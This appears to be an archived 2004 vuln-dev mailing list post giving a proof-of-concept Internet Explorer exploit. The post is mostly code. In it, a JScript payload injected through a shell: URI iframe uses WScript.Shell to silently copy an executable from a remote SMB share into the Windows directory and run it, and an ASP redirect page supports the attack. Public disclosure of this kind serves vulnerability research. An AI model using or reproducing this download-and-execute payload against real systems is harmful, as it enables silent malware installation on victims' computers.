IE Shell URI Download and Execute, POC

From: Ferruh Mavituna (ferruh_at_mavituna.com)
Date: 07/14/04

  • Next message: V. Poddubnyy: "RE: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing"
    To: <vuln-dev@securityfocus.com>
    Date: Wed, 14 Jul 2004 11:53:13 +0300
    
    

    Hello;

    Code is based on http://www.securityfocus.com/archive/1/367878 (POC by
    Jelmer) message. I just added a new feature "download" and then execute
    application. Also I use Wscript.Shell in Javascript instead of
    Shell.Application.

    1- copy \\IPADDRESS\NULLSHAREDFOLDER\bad.exe (stealth)
    2- Wait for download
    3- Execute bad.exe (stealth)

    New shellscript.js
    =====================================================
    function injectIt() {
            
    document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<s
    cript language="JScript" DEFER> var
    rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"; var
    wF="%windir%\\\\_tmp.exe"; var o=new ActiveXObject("wscript.shell"); var
    e="%comspec% /c copy "+rF+" "+wF; var
    err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>');
    }
    document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
    setTimeout("injectIt()", 1000);
    =====================================================

    Also for testing in IIS Servers; ASP equivalent of redir.jsp

    redir.asp
    =====================================================
    <%
    Response.Expires = 1
    Response.Expiresabsolute = Now() - 1
    Response.AddHeader "pragma","no-cache"
    Response.AddHeader "cache-control","private"
    Response.CacheControl = "no-cache"
    For x = 1 to 500000 'Time
       z = z + 10
    Next

    Response.Status = "302 Found"
    Response.AddHeader "Content-Length", "4"
    Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
    %>
    =====================================================

    Download All Files : http://ferruh.mavituna.com/exploits/fm_ieshell.zip
    Online URL : http://ferruh.mavituna.com/article/?553

    Ferruh.Mavituna
    http://ferruh.mavituna.com
    PGPKey : http://ferruh.mavituna.com/PGPKey.asc


  • Next message: V. Poddubnyy: "RE: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing"

    Relevant Pages